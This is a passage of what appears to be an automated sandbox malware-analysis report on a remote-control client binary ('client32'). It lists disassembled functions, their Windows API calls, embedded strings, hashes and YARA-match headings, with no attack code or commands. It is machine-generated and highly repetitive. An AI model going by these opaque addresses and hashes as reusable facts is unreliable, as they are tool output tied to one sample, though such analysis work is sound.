                                                                                • Part of subcall function 11096D90: CLSIDFromProgID.OLE32(HNetCfg.FwMgr,?,?,?,?,?,?,?,111385EB), ref: 11096DBE
                                                                                • Part of subcall function 11096D90: CoCreateInstance.OLE32(?,00000000,00000001,111C1B4C,?,?,?,?,?,?,?,111385EB), ref: 11096DDB
                                                                                • Part of subcall function 11096D90: CoUninitialize.OLE32(?,?,?,?,?,?,111385EB), ref: 11096DF9
                                                                              • GetTickCount.KERNEL32 ref: 111385F1
                                                                              • _memset.LIBCMT ref: 11138633
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 11138649
                                                                              • _strrchr.LIBCMT ref: 11138658
                                                                              • _free.LIBCMT ref: 111386AA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountTick$CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_memset_strrchr
                                                                              • String ID: *AutoICFConfig$Client$ICFConfig$ICFConfig2 returned 0x%x$IsICFPresent() took %d ms$IsICFPresent...$No ICF present
                                                                              • API String ID: 711243594-1270230032
                                                                              • Opcode ID: 5eb3671e29344256acc8e4b42e6a6c739429c132e016e962bb157113eab44bd9
                                                                              • Instruction ID: 5891752c4c55aadc8c036c0ba7fa863b534ef4ea4707a2085efa3f6ff011156f
                                                                              • Opcode Fuzzy Hash: 5eb3671e29344256acc8e4b42e6a6c739429c132e016e962bb157113eab44bd9
                                                                              • Instruction Fuzzy Hash: D8419C7AE0012E9BD710DB755C85FDAF778EB5531CF0001B9EC0997284EAB1A944CBE1
                                                                              Function 11134D90 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 11146010: _memset.LIBCMT ref: 11146055
                                                                                • Part of subcall function 11146010: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
                                                                                • Part of subcall function 11146010: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
                                                                                • Part of subcall function 11146010: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
                                                                                • Part of subcall function 11146010: FreeLibrary.KERNEL32(00000000), ref: 111460BF
                                                                                • Part of subcall function 11146010: GetSystemDefaultLangID.KERNEL32 ref: 111460CA
                                                                              • AdjustWindowRectEx.USER32(11142328,00CE0000,00000001,00000001), ref: 11134DD7
                                                                              • LoadMenuA.USER32(00000000,000003EC), ref: 11134DE8
                                                                              • GetSystemMetrics.USER32(00000021), ref: 11134DF9
                                                                              • GetSystemMetrics.USER32(0000000F), ref: 11134E01
                                                                              • GetSystemMetrics.USER32(00000004), ref: 11134E07
                                                                              • GetDC.USER32(00000000), ref: 11134E13
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 11134E1E
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 11134E2A
                                                                              • CreateWindowExA.USER32(00000001,NSMWClass,037C0C60,00CE0000,80000000,80000000,11142328,?,00000000,?,11000000,00000000), ref: 11134E7F
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,110F8239,00000001,11142328,_debug), ref: 11134E87
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion_memset
                                                                              • String ID: CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
                                                                              • API String ID: 1594747848-1114959992
                                                                              • Opcode ID: 66ba732ae51c7fd460c66f2128e0a3373d5a4979d1dd1b3930dacd21693fd196
                                                                              • Instruction ID: ea278f5fd7360d42281fd81be3dd0b2008dee34a98883b586f11dcb677731357
                                                                              • Opcode Fuzzy Hash: 66ba732ae51c7fd460c66f2128e0a3373d5a4979d1dd1b3930dacd21693fd196
                                                                              • Instruction Fuzzy Hash: 04317075A40229ABDB149FE58D85FAEFBB8FB48709F100528FA11A7644D6746900CBA4
                                                                              Function 11133B00 Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 107COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • wsprintfA.USER32 ref: 11133B70
                                                                              • GetTickCount.KERNEL32 ref: 11133BA1
                                                                              • SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11133BB4
                                                                              • GetTickCount.KERNEL32 ref: 11133BBC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountTick$FolderPathwsprintf
                                                                              • String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe
                                                                              • API String ID: 1170620360-4157686185
                                                                              • Opcode ID: 3e33b262656940685e1aad64be50304ad358b3175c825220752b1feac52a0f54
                                                                              • Instruction ID: ff3437da4bce093be243bc4ea55ba4e08a4d9634e929d706e548d7c9b68f93f5
                                                                              • Opcode Fuzzy Hash: 3e33b262656940685e1aad64be50304ad358b3175c825220752b1feac52a0f54
                                                                              • Instruction Fuzzy Hash: 68315BB5E1022EABD3209BB19D80FEDF3789B9031DF100065E815A7644EF71B9048795
                                                                              Function 11027200 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 174sleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _strtok.LIBCMT ref: 11027286
                                                                              • _strtok.LIBCMT ref: 110272C0
                                                                              • Sleep.KERNEL32(110302E7,?,*max_sessions,0000000A,00000000,?,00000002), ref: 110273B4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _strtok$Sleep
                                                                              • String ID: *max_sessions$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS
                                                                              • API String ID: 2009458258-3774545468
                                                                              • Opcode ID: 63e92d32746378da14513997d44a64d2e58a17b182b9feed40e1f111193f9b60
                                                                              • Instruction ID: 2d05d95278d551eaaa07460440d96754ad32abd10519b78537541f164f63ece7
                                                                              • Opcode Fuzzy Hash: 63e92d32746378da14513997d44a64d2e58a17b182b9feed40e1f111193f9b60
                                                                              • Instruction Fuzzy Hash: EE513536E0166A8BDB11CFE4CC81FEEFBF4AF95308F644169E81567244D7316849CB92
                                                                              Function 111037D0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 68threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 11089560: UnhookWindowsHookEx.USER32(?), ref: 11089583
                                                                              • GetCurrentThreadId.KERNEL32 ref: 111037EC
                                                                              • GetThreadDesktop.USER32(00000000), ref: 111037F3
                                                                              • OpenDesktopA.USER32(?,00000000,00000000,02000000), ref: 11103803
                                                                              • SetThreadDesktop.USER32(00000000), ref: 11103810
                                                                              • CloseDesktop.USER32(00000000), ref: 11103829
                                                                              • GetLastError.KERNEL32 ref: 11103831
                                                                              • CloseDesktop.USER32(00000000), ref: 11103847
                                                                              • GetLastError.KERNEL32 ref: 1110384F
                                                                              Strings
                                                                              • OpenDesktop(%s) failed, e=%d, xrefs: 11103857
                                                                              • SetThreadDesktop(%s) failed, e=%d, xrefs: 11103839
                                                                              • SetThreadDesktop(%s) ok, xrefs: 1110381B
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Desktop$Thread$CloseErrorLast$CurrentHookOpenUnhookWindows
                                                                              • String ID: OpenDesktop(%s) failed, e=%d$SetThreadDesktop(%s) failed, e=%d$SetThreadDesktop(%s) ok
                                                                              • API String ID: 2036220054-60805735
                                                                              • Opcode ID: da88b65c0f1a222e5146661c722578c7b813502f3e62b472f9264116a955105f
                                                                              • Instruction ID: e88c17566eeed1fb37d42defb77813990fcfc850afde34c4ed6f8b5b44c54373
                                                                              • Opcode Fuzzy Hash: da88b65c0f1a222e5146661c722578c7b813502f3e62b472f9264116a955105f
                                                                              • Instruction Fuzzy Hash: 4A112979F402196BE7047BB25C89F6FFA2C9F8561DF000038F8268A645EF24A40083B6
                                                                              Function 1115F240 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 57COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1115F268
                                                                              • GetLastError.KERNEL32 ref: 1115F275
                                                                              • wsprintfA.USER32 ref: 1115F288
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                • Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4
                                                                              • GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1115F2CC
                                                                              • GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1115F2D9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
                                                                              • String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
                                                                              • API String ID: 1734919802-1728070458
                                                                              • Opcode ID: 402ec4c373f1d9ae321d95a7acd37e1e5b6a56151d149dbb571c93f25e459d97
                                                                              • Instruction ID: 07e815115c29277e6575bd3acbfe434a71258061b731743832bfb2ada14664d5
                                                                              • Opcode Fuzzy Hash: 402ec4c373f1d9ae321d95a7acd37e1e5b6a56151d149dbb571c93f25e459d97
                                                                              • Instruction Fuzzy Hash: BB1127B5A4031AEBC720EFE69C80ED5F7B4FF22718B00466EE46643140EB70E544CB81
                                                                              Function 11110DE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 132threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                              • std::exception::exception.LIBCMT ref: 11110E4A
                                                                              • __CxxThrowException@8.LIBCMT ref: 11110E5F
                                                                              • GetCurrentThreadId.KERNEL32 ref: 11110E76
                                                                              • InitializeCriticalSection.KERNEL32(-00000010,?,11031700,00000001,00000000), ref: 11110E89
                                                                              • InitializeCriticalSection.KERNEL32(111F18F0,?,11031700,00000001,00000000), ref: 11110E98
                                                                              • EnterCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110EAC
                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031700), ref: 11110ED2
                                                                              • LeaveCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110F5F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                              • String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
                                                                              • API String ID: 1976012330-1024648535
                                                                              • Opcode ID: d645c5834ea71053a0f95081aaaa0ddb1bcc4547c3ef44f405f5b2b37748006b
                                                                              • Instruction ID: f3d5edf841f59403b8991f5d6a5c2e10d1098d1cef77e9e1f9f0bcea7e620dca
                                                                              • Opcode Fuzzy Hash: d645c5834ea71053a0f95081aaaa0ddb1bcc4547c3ef44f405f5b2b37748006b
                                                                              • Instruction Fuzzy Hash: 2141AD75E00626AFDB11CFB98D80AAAFBF4FB45708F00453AF815DB248E77599048B91
                                                                              Function 11061320 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 289registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,11180365,00000000,00000000,AB86ACF8,00000000,?,00000000), ref: 110613A4
                                                                              • _malloc.LIBCMT ref: 110613EB
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              • RegEnumValueA.ADVAPI32(?,?,?,00000000,00000000,00000000,000000FF,?,AB86ACF8,00000000), ref: 1106142B
                                                                              • RegEnumValueA.ADVAPI32(?,00000000,?,00000100,00000000,?,000000FF,?), ref: 11061492
                                                                              • _free.LIBCMT ref: 110614A4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: EnumValue$ErrorExitInfoLastMessageProcessQuery_free_mallocwsprintf
                                                                              • String ID: ..\ctl32\Config.cpp$err == 0$maxname < _tsizeof (m_szSectionAndKey)$strlen (k.m_k) < _tsizeof (m_szSectionAndKey)
                                                                              • API String ID: 999355418-161875503
                                                                              • Opcode ID: 1fd6cffb0b6506106fbd2de026ba492dd64e6340ee49c1c0b4f88686c2a5e216
                                                                              • Instruction ID: 6cc8e5caf6a1957f468abfb3494a260dc46a483def11051c8948769c459486e3
                                                                              • Opcode Fuzzy Hash: 1fd6cffb0b6506106fbd2de026ba492dd64e6340ee49c1c0b4f88686c2a5e216
                                                                              • Instruction Fuzzy Hash: 78A1A175A007469FE721CF64C880BABFBF8AF49304F144A5DE59697680E771F508CBA1
                                                                              Function 1115C8E0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 183commemoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,AB86ACF8,00000000,?), ref: 1115C927
                                                                              • CoCreateInstance.OLE32(111C627C,00000000,00000017,111C61AC,?), ref: 1115C947
                                                                              • wsprintfW.USER32 ref: 1115C967
                                                                              • SysAllocString.OLEAUT32(?), ref: 1115C973
                                                                              • wsprintfW.USER32 ref: 1115CA27
                                                                              • SysFreeString.OLEAUT32(?), ref: 1115CAC8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
                                                                              • String ID: SELECT * FROM %s$WQL$root\CIMV2
                                                                              • API String ID: 3050498177-823534439
                                                                              • Opcode ID: 175defb0ff3311be352c3e895ec4c40801578b620f8bdfb43f719b83b34ddfee
                                                                              • Instruction ID: 91bf14772fb0e49150e0dc85e0cb347219a857647afd576183cc1e94570c565b
                                                                              • Opcode Fuzzy Hash: 175defb0ff3311be352c3e895ec4c40801578b620f8bdfb43f719b83b34ddfee
                                                                              • Instruction Fuzzy Hash: 04518071B40619AFC764CF69CC94F9AFBB8EB8A714F0046A9E429D7640DA30AE41CF51
                                                                              Function 11146010 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
